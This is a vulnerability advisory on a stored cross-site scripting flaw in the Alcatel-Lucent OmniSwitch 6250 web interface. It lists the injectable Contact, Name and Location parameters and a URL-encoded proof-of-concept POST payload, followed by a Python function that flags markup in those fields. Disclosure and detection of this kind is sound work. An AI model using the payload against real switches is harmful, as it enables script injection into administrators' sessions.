Alcatel-Lucent OmniSwitch 6250 Switch sys_filesystem_info_si.html Multiple Parameter Stored XSS

The Alcatel-Lucent OmniSwitch 6250 Switch has a stored cross-site scripting (XSS) vulnerability in the /sys/content/sys_filesystem_info_si.html page (CVE-2016-78002). An authenticated user with permission to update the fields can inject arbitrary JavaScript into three fields; the values are stored and displayed on /phys/content/phys_chs_info_stable.html when that page is viewed. The fields and their parameters are Contact (EmWeb_ns:mip:208.T1:O1), Name (EmWeb_ns:mip:209.T1:O2) and Location (EmWeb_ns:mip:210.T1:O3), all of which are updated by a POST request.

The payload looks like:

EmWeb_ns%3Amip%3A208.T1%3AO1=Alcatel-Lucent+%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%27df-location%27%29%3C%2Fscript%3E&EmWeb_ns%3Amip%3A209.T1%3AO2=vxTarget%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%27df-name%27%29%3C%2Fscript%3E&EmWeb_ns%3Amip%3A210.T1%3AO3=vxTarget%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%27df-location%27%29%3C%2Fscript%3E&EmWeb_ns%3Amip%3A211=Apply
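
A defensive check for the request described above, as an added example that is not part of the original advisory: it decodes a form-encoded POST body and reports any of the three named parameters whose value contains HTML metacharacters, together with the HTML-escaped form that is safe to render. The function name, the character set and the sample body are assumptions constructed for illustration.

```python
import html
import re
from urllib.parse import parse_qsl

# Parameter names are taken from the advisory; labels are the UI field names.
WATCHED = {
    "EmWeb_ns:mip:208.T1:O1": "Contact",
    "EmWeb_ns:mip:209.T1:O2": "Name",
    "EmWeb_ns:mip:210.T1:O3": "Location",
}

# Assumed character set: characters that let a value close an HTML
# attribute or open a new element.
MARKUP = re.compile(r'[<>"]')

# Constructed sample body (not captured traffic): only Name carries markup.
SAMPLE = (
    "EmWeb_ns%3Amip%3A208.T1%3AO1=NOC+team"
    "&EmWeb_ns%3Amip%3A209.T1%3AO2=sw1%22%3E%3Cb%3E"
    "&EmWeb_ns%3Amip%3A210.T1%3AO3=Rack+4"
    "&EmWeb_ns%3Amip%3A211=Apply"
)


def audit_post_body(body):
    """Return (field, decoded_value, escaped_value) for each watched
    parameter whose decoded value contains HTML metacharacters."""
    findings = []
    # parse_qsl percent-decodes keys and values and turns '+' into a space.
    for key, value in parse_qsl(body, keep_blank_values=True):
        label = WATCHED.get(key)
        if label and MARKUP.search(value):
            # html.escape shows what the page should emit instead of the raw value.
            findings.append((label, value, html.escape(value, quote=True)))
    return findings


if __name__ == "__main__":
    for field, raw, safe in audit_post_body(SAMPLE):
        print(f"{field}: raw={raw!r} escaped={safe!r}")
```

The same function can be run over proxy or web-server logs that record POST bodies to find switches whose Contact, Name or Location values already contain markup.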
